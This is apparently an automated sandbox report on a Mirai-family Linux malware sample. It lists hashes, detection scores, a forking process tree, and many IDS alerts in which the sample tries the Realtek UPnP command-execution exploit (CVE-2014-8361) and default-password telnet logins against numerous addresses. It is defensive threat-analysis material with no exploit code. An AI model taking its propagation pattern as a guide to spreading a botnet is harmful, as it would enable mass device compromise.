Play interactive tour

Edit tour

Linux Analysis Report Antisocial.x86

Overview

General Information

Sample Name:	Antisocial.x86
Analysis ID:	512852
MD5:	abf15f119a5fa686f85e3a9ce8f57cdc
SHA1:	6531db808704d554554e9b696f965e94088fdd00
SHA256:	e41b1347da792c9718d4a65b26cdb2fdda54590f40a4fa1441c7954f09545df4
Tags:	Mirai
Infos:

Detection

Mirai

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Connects to many ports of the same IP (likely port scanning)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Detected TCP or UDP traffic on non-standard ports

Executes the "rm" command used to delete files or directories

Classification

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	512852
Start date:	01.11.2021
Start time:	13:37:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Antisocial.x86
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal84.troj.linX86@0/1@0/0
Warnings:	Show All Report size exceeded maximum capacity and may have missing network information. TCP Packets have been reduced to 100 VT rate limit hit for: /opt/package/joesandbox/database/analysis/512852/sample/Antisocial.x86

Process Tree

system is lnxubuntu20

Antisocial.x86 (PID: 5225, Parent: 5102, MD5: abf15f119a5fa686f85e3a9ce8f57cdc) Arguments: /tmp/Antisocial.x86

Antisocial.x86 New Fork (PID: 5226, Parent: 5225)

Antisocial.x86 New Fork (PID: 5237, Parent: 5226)

Antisocial.x86 New Fork (PID: 5238, Parent: 5226)

Antisocial.x86 New Fork (PID: 5239, Parent: 5238)

Antisocial.x86 New Fork (PID: 5250, Parent: 5239)

Antisocial.x86 New Fork (PID: 5251, Parent: 5239)

Antisocial.x86 New Fork (PID: 5252, Parent: 5239)

Antisocial.x86 New Fork (PID: 5253, Parent: 5239)

Antisocial.x86 New Fork (PID: 5240, Parent: 5238)

Antisocial.x86 New Fork (PID: 5242, Parent: 5238)

Antisocial.x86 New Fork (PID: 5244, Parent: 5238)

Antisocial.x86 New Fork (PID: 5246, Parent: 5238)

Antisocial.x86 New Fork (PID: 5227, Parent: 5225)

Antisocial.x86 New Fork (PID: 5228, Parent: 5225)

Antisocial.x86 New Fork (PID: 5229, Parent: 5228)

Antisocial.x86 New Fork (PID: 5241, Parent: 5229)

Antisocial.x86 New Fork (PID: 5243, Parent: 5229)

Antisocial.x86 New Fork (PID: 5245, Parent: 5229)

Antisocial.x86 New Fork (PID: 5247, Parent: 5229)

Antisocial.x86 New Fork (PID: 5230, Parent: 5228)

Antisocial.x86 New Fork (PID: 5231, Parent: 5228)

Antisocial.x86 New Fork (PID: 5232, Parent: 5228)

Antisocial.x86 New Fork (PID: 5234, Parent: 5228)

dash New Fork (PID: 5268, Parent: 4332)

cat (PID: 5268, Parent: 4332, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.zwbUWO1Xs3

dash New Fork (PID: 5269, Parent: 4332)

head (PID: 5269, Parent: 4332, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 5270, Parent: 4332)

tr (PID: 5270, Parent: 4332, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 5271, Parent: 4332)

cut (PID: 5271, Parent: 4332, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 5272, Parent: 4332)

cat (PID: 5272, Parent: 4332, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.zwbUWO1Xs3

dash New Fork (PID: 5273, Parent: 4332)

head (PID: 5273, Parent: 4332, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 5274, Parent: 4332)

tr (PID: 5274, Parent: 4332, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 5275, Parent: 4332)

cut (PID: 5275, Parent: 4332, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 5276, Parent: 4332)

rm (PID: 5276, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.zwbUWO1Xs3 /tmp/tmp.7ybUxelKh4 /tmp/tmp.tWQiSu25Ld

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Antisocial.x86	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
5250.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5237.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5240.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5226.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5230.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5227.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5241.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5225.1.000000001a887bdc.000000001843e942.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 3 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Antisocial.x86

ReversingLabs: Detection: 55%

Machine Learning detection for sample

Show sources

Source: Antisocial.x86

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 34.249.145.219:443 -> 192.168.2.23:39546 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58860 -> 91.214.119.191:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58860 -> 91.214.119.191:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58864 -> 91.214.119.191:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56630 -> 45.42.85.205:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56630 -> 45.42.85.205:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34958 -> 45.42.84.73:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34958 -> 45.42.84.73:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 60.32.72.62:23 -> 192.168.2.23:55066
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 24.211.85.103:23 -> 192.168.2.23:59452
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 24.211.85.103:23 -> 192.168.2.23:59452
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45376 -> 91.78.164.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45376 -> 91.78.164.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48154 -> 185.14.68.196:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48154 -> 185.14.68.196:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45380 -> 91.78.164.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48170 -> 185.14.68.196:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39650 -> 45.42.88.123:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39650 -> 45.42.88.123:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52172 -> 45.41.81.181:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52172 -> 45.41.81.181:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42400 -> 45.120.204.197:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42400 -> 45.120.204.197:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.23.114.190:23 -> 192.168.2.23:36786
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40470 -> 185.131.77.27:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40470 -> 185.131.77.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40506 -> 185.131.77.27:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32922 -> 45.115.236.234:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:32922 -> 45.115.236.234:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41278 -> 45.254.24.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41278 -> 45.254.24.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:32936 -> 45.115.236.234:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53336 -> 185.235.181.132:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53336 -> 185.235.181.132:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53338 -> 185.235.181.132:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60076 -> 45.81.128.196:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60076 -> 45.81.128.196:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52484 -> 45.43.233.7:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52484 -> 45.43.233.7:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.149.84.42:23 -> 192.168.2.23:48948
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.149.84.42:23 -> 192.168.2.23:48948
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33960 -> 91.78.147.92:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33960 -> 91.78.147.92:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33972 -> 91.78.147.92:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58326 -> 185.221.85.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58326 -> 185.221.85.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58328 -> 185.221.85.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48550 -> 91.78.101.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48550 -> 91.78.101.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48558 -> 91.78.101.140:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50392 -> 45.42.80.176:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50392 -> 45.42.80.176:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60812 -> 45.120.206.240:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60812 -> 45.120.206.240:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50026 -> 45.43.235.163:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50026 -> 45.43.235.163:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 24.211.85.103:23 -> 192.168.2.23:59618
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 24.211.85.103:23 -> 192.168.2.23:59618
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59298 -> 45.120.184.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59298 -> 45.120.184.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37192 -> 91.77.197.115:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37192 -> 91.77.197.115:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37196 -> 91.77.197.115:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36908 -> 185.14.174.249:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36908 -> 185.14.174.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36916 -> 185.14.174.249:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47654 -> 45.41.82.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47654 -> 45.41.82.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36906 -> 45.158.23.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36906 -> 45.158.23.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51872 -> 45.42.93.220:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51872 -> 45.42.93.220:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60764 -> 45.33.254.50:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60764 -> 45.33.254.50:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47728 -> 185.245.1.32:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47728 -> 185.245.1.32:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46750 -> 45.41.90.51:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46750 -> 45.41.90.51:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.224.9.14:23 -> 192.168.2.23:35918
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46918 -> 45.125.110.121:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46918 -> 45.125.110.121:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51026 -> 45.195.68.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51026 -> 45.195.68.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59324 -> 185.235.183.128:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59324 -> 185.235.183.128:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59326 -> 185.235.183.128:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50996 -> 185.133.76.180:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50996 -> 185.133.76.180:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41500 -> 185.242.234.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41500 -> 185.242.234.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40734 -> 91.78.31.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40734 -> 91.78.31.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45380 -> 185.235.183.127:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45380 -> 185.235.183.127:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45386 -> 185.235.183.127:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47356 -> 185.207.92.153:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47356 -> 185.207.92.153:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40742 -> 91.78.31.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47398 -> 185.207.92.153:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 212.123.70.64:23 -> 192.168.2.23:51538
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39358 -> 185.65.161.253:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39358 -> 185.65.161.253:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39398 -> 185.65.161.253:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 212.123.70.64:23 -> 192.168.2.23:51578
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:49288 -> 121.149.84.42:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 63.86.65.29:23 -> 192.168.2.23:45038
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53370 -> 45.115.230.175:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53370 -> 45.115.230.175:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 212.123.70.64:23 -> 192.168.2.23:51594
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60088 -> 91.78.69.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60088 -> 91.78.69.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60090 -> 91.78.69.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41214 -> 185.71.66.38:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41214 -> 185.71.66.38:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41234 -> 185.71.66.38:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33472 -> 45.41.86.199:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33472 -> 45.41.86.199:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51248 -> 45.138.68.139:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51248 -> 45.138.68.139:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53152 -> 45.138.69.152:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53152 -> 45.138.69.152:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46856 -> 185.245.0.53:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46856 -> 185.245.0.53:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53382 -> 185.216.251.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53382 -> 185.216.251.165:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.149.84.42:23 -> 192.168.2.23:49288
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.149.84.42:23 -> 192.168.2.23:49288
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45954 -> 185.242.235.56:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45954 -> 185.242.235.56:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45964 -> 185.242.235.56:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33464 -> 185.239.59.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33464 -> 185.239.59.144:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38296 -> 91.77.228.130:52869
